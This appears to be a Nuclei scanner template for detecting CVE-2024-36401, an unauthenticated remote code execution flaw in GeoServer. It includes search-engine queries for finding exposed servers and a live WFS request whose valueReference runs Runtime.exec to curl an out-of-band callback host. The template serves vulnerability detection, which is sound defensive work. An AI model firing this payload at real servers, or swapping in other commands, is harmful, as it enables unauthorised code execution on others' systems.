id: CVE-2024-36401 info: name: GeoServer RCE in Evaluating Property Name Expressions author: DhiyaneshDk severity: critical description: | In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions. impact: | This vulnerability can lead to executing arbitrary code. reference: - https://x.com/sirifu4k1/status/1808270303275241607 - https://nvd.nist.gov/vuln/detail/CVE-2024-36401 - https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401 - https://github.com/advisories/GHSA-6jj6-gm7p-fcvv metadata: verified: true max-request: 1 vendor: osgeo product: geoserver shodan-query: http.title:"geoserver" fofa-query: - title="geoserver" - app="geoserver" google-query: intitle:"geoserver" tags: cve,cve2024,geoserver,rce,unauth flow: | if(http(1)) { set("name",template.typename[0]) http(2) } http: - raw: - | GET /geoserver/web/wicket/bookmarkable/org.geoserver.web.demo.MapPreviewPage HTTP/1.1 Host: {{Hostname}} host-redirects: true extractors: - type: regex name: typename part: body group: 1 regex: - typeName=([^&\]]+) internal: true - raw: - | @timeout 20s GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames={{name}}&valueReference=exec(java.lang.Runtime.getRuntime(),'curl+{{interactsh-url}}') HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "dns" - type: word part: content_type words: - "application/xml" # digest: 4a0a004730450220279aaebd1a369cf4592114ead904a1520e41ad97306683da9c89b53d278a40a3022100d045a6c3237dcc38c0af5dce4e225c736ea8361f759fb8fc444da9a24ab3c6ed:922c64590222798bb761d5b6d8e72950